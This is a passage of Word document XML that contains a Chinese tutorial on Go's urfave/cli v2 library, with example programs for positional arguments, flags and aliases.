    <w:p w14:paraId="6037FF28" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F44949F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"github.com/urfave/cli/v2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65067199" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4340F29E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DA870CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FBC39C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>app := &amp;cli.App{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228C036D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        Name:  "boom",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706C3893" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        Usage: "make an explosive entrance",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C3404A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        Action: func(*cli.Context) error {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1786051E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            fmt.Println("boom! I say!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7F0627" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            return nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231BBDC4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4BD97F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE3E069" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2324FEFA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    if err := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>app.Run(os.Args);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5686B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        log.Fatal(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7A5E9D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008C81DC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295E79B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制列表参数（不指名的无名参数）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28701C14" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数需要从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>os.Args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传入到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Action</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指向的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，变为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>*cli.Context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>才可以，如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF1EBE4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF36A00" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B364DE7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5770D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E907405" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "log"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BFB929" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"os"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242F2F77" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="413CAC57" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"github.com/urfave/cli/v2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAC63B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237A42B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="245E3B27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E100462" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    app := &amp;cli.App{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57850CCD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Action: func(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cCtx *cli.Context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>) error {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2648EF36" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            fmt.Printf("Hello %q", </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cCtx.Args().Get(0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570DC32E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            return nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4605B060" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634C2598" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4B266F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D0E77F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    if err := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>app.Run(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>os.Args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1C500F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        log.Fatal(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3844C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B3BE3F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9627AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定参数（常见的指名指值的参数）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7C881D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567E94D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>app:=&amp;cli.App{}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Flags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> []cli.Flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型。其中可以设置指针的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;cli.StringFlag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IntFlag  BoolFlag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。通常指定默认值。对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BoolFlag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，通常是把值的出现次数给记录到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型，例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -vv </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-v -v </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一样是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次这种的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5120701E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="647A0656" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置短名称，则是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Aliases: []string{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种字段来设置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38521079" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>占位符值（没用，无值）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4EB5C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&amp;cli.StringFlag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是此处没有进行接收。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A008CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7E9031" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="616E7AF8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66706DC2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022F9A60" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "log"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774201C1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "os"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4A41C0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
